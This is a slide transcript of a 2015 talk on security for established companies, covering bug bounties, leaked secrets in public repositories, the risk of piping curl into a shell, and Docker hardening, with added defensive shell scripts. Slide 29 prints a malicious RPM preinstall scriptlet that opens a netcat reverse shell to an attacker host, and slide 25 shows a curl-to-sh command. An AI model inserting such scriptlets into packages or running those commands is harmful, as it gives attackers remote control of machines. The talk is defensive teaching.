Security for non-unicorns

Bea Hughes
September 25, 2015


Operability.io September 2015.

Security is becoming quite the thing nowadays; everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than, say, 6 months? You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things, what happens when you do uncover them, how to stop them happening, and coping strategies for dealing with them.


Transcript

  1. Security For Non-Unicorns. https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog @benjammingh for Operability.io

  2. Who's this clown?
    • Infrastructure security charlatan at Etsy.
    • Operations monkey at Puppet Labs.
    • Survived a bunch of startups in London (some of them still have websites...).
    • Has far too many opinions about pretty much everything on the TwitterNet: @benjammingh.
    https://twitter.com/skullmandible/status/411281851131523072

  3. Unicorns?

  4. Setlist
    • The problem(™).
    • The solution(s)(™).
    • The wrap up.
    • Rapturous applause.
    • We all go home/dance parties/our secret lives as superheroes & heroines.

  5. The problem: security is hard.

  6. From tiny seeds, do mighty acorns grow.
    • PinkiePwn's 6 small bugs in Chrome to full sandbox escape.
    • Egor Homakov's 5 small bugs in GitHub to full private access on GitHub.
    • From XSS to remote code execution in under an hour.
    • Username & password stolen for an HVAC system leads to the $160+ million Target breach.

  7. Things that aren't security are hard too.

  8. Computering is hard. No. 1 takeaway for security types is a sense of perspective.

  9. Security people aren't great secure coders.
    • Snort: 10 CVEs, Wireshark: 322! CVEs.
    • Joxean Koret on breaking antivirus software.
    • Security firm Bit9 hacked, used to spread malware.
    • Tavis Ormandy from Project Zero on exploiting ESET.
    • BEST! FireEye just running Apache/PHP as root.

  10. So who do I trust?
    • No one? Always a great position for security people who don't want to get paid.
    • Everyone? Do I have a 419 email for YOU!
    • Security vendors? If you have infinite money and no attackers.
    • Attackers!

  11. "You're already being probed for security holes, do you want to know or not?"

  12. Bug bounties 101: Have one! Bugcrowd vs. HackerOne.

  13. Bug bounties 102: Prepare a lot.

  14. Bug bounties 103: The first few weeks will be hell.

  15. Bug bounties 104: Be ready with bees!

  16. Security on the inside.

  17. Armadillo security architecture.

  18. Cloud.

  19. GitHub.

  21. But this doesn't happen in real life, right?

  23. Go use Gitrob.
    • http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/
    • https://github.com/michenriksen/gitrob
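Gitrob (slide 23) does this hunt across an organisation's public GitHub repositories, which is exactly what slide 44 says attackers are already doing. As an added example, not Gitrob and not the speaker's code, here is a small POSIX shell check in the same spirit that you can run over a local checkout before it is pushed anywhere. The signature list is a deliberately short illustrative subset, the sample repository it builds is constructed for the demo, the key material in it is fake, and the AWS key id is AWS's documented example value.

```shell
#!/bin/sh
# Added example (not Gitrob, not from the talk): a grep-based "what would an
# attacker find in this repo?" check. Signatures are an illustrative subset;
# the sample repository is constructed, its key is fake, and the AWS key id
# is AWS's own documentation example.

# scan_for_secrets DIR: print one "path: reason" line per finding.
scan_for_secrets() {
    dir=$1
    {
        # Pass 1: filenames that should never be committed, wherever they sit.
        find "$dir" -type f \( -name 'id_rsa' -o -name 'id_dsa' -o -name '.netrc' \
            -o -name '.env' -o -name '*.pem' -o -name 'credentials' \) -print |
            sed 's/$/: sensitive filename/'
        # Pass 2: contents that look like credentials, whatever the filename.
        grep -rlE -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' "$dir" |
            sed 's/$/: private key material/'
        grep -rlE -e 'AKIA[0-9A-Z]{16}' "$dir" |
            sed 's/$/: AWS access key id/'
        grep -rliE -e '(password|passwd|secret)[[:space:]]*[:=][[:space:]]*[^[:space:]]{8,}' "$dir" |
            sed 's/$/: hard-coded password or secret/'
    } | sort -u
}

# repo_is_clean DIR: exit status 0 when nothing was found, 1 otherwise,
# so it can sit directly in a pre-commit hook or a CI job.
repo_is_clean() {
    [ -z "$(scan_for_secrets "$1")" ]
}

# make_sample_repo: build a constructed checkout with the classic mistakes
# in it and print its path.
make_sample_repo() {
    dir=$(mktemp -d)
    mkdir -p "$dir/.ssh" "$dir/config" "$dir/src"
    # Fake key: the header is what the scanner keys on, the body is filler.
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' \
        'MIIEowIBAAKCAQEAconstructedfillernotarealkey' \
        '-----END RSA PRIVATE KEY-----' > "$dir/.ssh/id_rsa"
    # A committed .env holding AWS's example key id and a password.
    printf '%s\n' 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE' \
        'DB_PASSWORD=hunter2hunter2' > "$dir/config/.env"
    # Innocent code that merely mentions the word password: must not fire.
    printf '%s\n' '# prompt the user for a password' 'read -r pw' > "$dir/src/login.sh"
    printf '%s\n' "$dir"
}

# Demo: scan the constructed repository, then remove it.
demo_repo=$(make_sample_repo)
scan_for_secrets "$demo_repo"
rm -rf "$demo_repo"
```

Run `repo_is_clean .` from a checkout and wire its exit status into a pre-commit hook. This finds the obvious things on the box in front of you; it does not find what is already in a public repository's history, which is what Gitrob is for, and a secret that has ever been pushed has to be rotated, not just deleted.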
  24. curl | bash

  25. curl legit.pw/mac | sh

  26. "But I check them, obviously!"

  28. curl | bash. "But this is no worse than packages."
    root# yum install sketchy

  29. curl | bash.
    root# rpm -qp --scripts sketchy-1.33-7.rpm
    preinstall scriptlet (using /bin/sh):
    bash -c 'while : ; do nc -e /bin/sh root.legit.pw 2222 ; done'

  30. A LIVE DEMO, madness.
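Slides 24 to 30 make the case against piping whatever a server sends straight into a shell, and slide 44 asks you to stop trusting curl. As an added example, not from the talk, here is the minimum that replaces `curl url | sh`: download to disk, compare against a SHA-256 you obtained out of band, and only then execute. The URL in the usage note is a placeholder and the script the demo runs is constructed; the pin has to come from somewhere other than the server that serves the script (a signed release page, a second channel, the value you recorded when you last read the script), or it proves nothing.

```shell
#!/bin/sh
# Added example (not from the talk): download, pin, verify, then run.
# The local script used in the demo is constructed; in real use the pin is
# published out of band, never fetched from the same server as the script.

# sha256_of FILE: hex digest, using whichever tool the host has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f 1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d ' ' -f 1
    else
        openssl dgst -sha256 "$1" | sed 's/^.*= //'
    fi
}

# verify_and_run FILE EXPECTED_SHA256 [ARGS...]: run FILE with sh only when
# its digest matches; return 2, having executed nothing, on a mismatch.
# Because FILE is on disk, the bytes that were hashed are exactly the bytes
# that get executed, which a pipe cannot guarantee.
verify_and_run() {
    file=$1; expected=$2; shift 2
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        printf 'refusing to run %s: sha256 %s, expected %s\n' \
            "$file" "$actual" "$expected" >&2
        return 2
    fi
    sh "$file" "$@"
}

# fetch_and_run URL EXPECTED_SHA256: the drop-in replacement for curl URL | sh.
fetch_and_run() {
    url=$1; expected=$2
    tmp=$(mktemp) || return 1
    if ! curl -fsSL -o "$tmp" "$url"; then
        rm -f "$tmp"; return 1
    fi
    verify_and_run "$tmp" "$expected"; rc=$?
    rm -f "$tmp"
    return "$rc"
}

# Demo with a constructed local script standing in for the download.
demo=$(mktemp)
printf '%s\n' 'echo "hello from a verified installer"' > "$demo"
pin=$(sha256_of "$demo")   # in real use this value arrives out of band
verify_and_run "$demo" "$pin"
# Simulate the server (or a man in the middle) changing the script after you audited it.
printf '%s\n' 'echo "and something that was not in the audited version"' >> "$demo"
verify_and_run "$demo" "$pin" || echo "mismatch detected, nothing was executed"
rm -f "$demo"
```

Usage is `fetch_and_run https://example.com/install.sh <pin>` (placeholder URL). The pin only proves you are running the bytes you reviewed; it does not make those bytes benign, so read the script first. Slide 29's `rpm -qp --scripts` is the equivalent look-before-you-install step for packages, whose scriptlets run as root just as happily.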

  31. Lightweight containers!

  32. chroot(8)

  33. FreeBSD Jails

  34. Solaris Zones

  35. AIX LPAR

  37. Is Docker secure?

  38. >30% of images in Docker Hub contain high priority security vulns. Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps.

  40. As secure as Vagrant?

  41. But is Docker itself secure?
    • Don't run things as root.
    • No really, stop running things as root.
    • Did I mention not running things as root.
    • It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as.)

  42. Securify the Docker.
    • Don't use --privileged.
    • Use --cap-drop ALL and then --cap-add <thing> to get the minimum capabilities.
    • Use Docker Notary.
    • Use GRSecurity (just do that anyway, if you can).
    • Use SELinux... I may as well ask for a pony here.
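Slides 41 and 42 reduce to three checks on the `docker run` line: no `--privileged`, start from `--cap-drop ALL` and add back only what the process needs, and don't be root. As an added example, not from the talk and not a Docker tool, here is a small POSIX shell lint for the argument list you are about to hand to `docker run`. It looks at the whole argument list, so a container command that itself takes a flag called `--privileged` would be a false positive; the image name `myapp:1.0` is hypothetical.

```shell
#!/bin/sh
# Added example (not from the talk, not part of Docker): lint a "docker run"
# argument list against slide 42's rules. The image name is hypothetical.

# audit_docker_run [docker run arguments...]
# Prints one line per problem; exit status 0 only when nothing was found.
audit_docker_run() {
    privileged=0; cap_drop_all=0; cap_add_all=0; user_set=0; problems=0
    while [ $# -gt 0 ]; do
        case $1 in
            --privileged)               privileged=1 ;;
            --cap-drop=[Aa][Ll][Ll])    cap_drop_all=1 ;;
            --cap-add=[Aa][Ll][Ll])     cap_add_all=1 ;;
            --user=*|-u=*)              user_set=1 ;;
            --cap-drop|--cap-add|--user|-u)
                # "--flag value" form: consume the value if one follows.
                flag=$1
                if [ $# -gt 1 ]; then
                    shift
                    case "$flag:$1" in
                        --cap-drop:[Aa][Ll][Ll]) cap_drop_all=1 ;;
                        --cap-add:[Aa][Ll][Ll])  cap_add_all=1 ;;
                        --user:*|-u:*)           user_set=1 ;;
                    esac
                fi ;;
        esac
        shift
    done
    if [ "$privileged" -eq 1 ]; then
        echo "FAIL --privileged: every capability plus the host's devices; remove it"
        problems=$((problems + 1))
    fi
    if [ "$cap_add_all" -eq 1 ]; then
        echo "FAIL --cap-add ALL: hands back everything --cap-drop ALL took away"
        problems=$((problems + 1))
    fi
    if [ "$cap_drop_all" -eq 0 ]; then
        echo "FAIL no --cap-drop ALL: container keeps Docker's default capability set; drop ALL, then --cap-add only what the process needs"
        problems=$((problems + 1))
    fi
    if [ "$user_set" -eq 0 ]; then
        echo "WARN no --user: the process runs as root unless the image's Dockerfile set USER; check with docker inspect"
        problems=$((problems + 1))
    fi
    [ "$problems" -eq 0 ]
}

# Demo: the usual way, then the same image the way slide 42 asks for. A web
# process that binds port 80 needs exactly one capability handed back.
echo "== docker run --privileged -p 80:80 myapp:1.0 =="
audit_docker_run --privileged -p 80:80 myapp:1.0 || true
echo "== docker run --cap-drop ALL --cap-add NET_BIND_SERVICE --user 1000:1000 -p 80:80 myapp:1.0 =="
audit_docker_run --cap-drop ALL --cap-add NET_BIND_SERVICE --user 1000:1000 -p 80:80 myapp:1.0 && echo "nothing to report"
```

The `--user` check is only a warning because the lint cannot see the image: an image whose Dockerfile sets `USER` already runs unprivileged, and `docker inspect` on the image shows whether it does. The lint says nothing about the image contents themselves, which is slide 38's problem and what Notary's signing is for.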
  43. Summary
    • Computers are apparently hard.
    • Security is clearly harder still, obv.
    • Actually trust and humans are hard.
    • The typing is the easy bit (ish).

  44. More Summary
    • Complex systems lead to much more complex security problems (see OAuth).
    • Annual pen-tests don't scale, bug bounties can.
    • Attackers are mining any public info you have (GitHub, S3).
    • I beg you to stop trusting curl.
    • Docker and security can be used in the same sentence.

  45. Thank you! Twidder: @benjammingh. LinkedIn: lnkdin.me/p/benyeah. FidoNet: 2:254/524.13. JitHub: github.com/barn. SpeakerDeck: speakerdeck.com/barnbarn. Etsy: Careers, CodeAsCraft.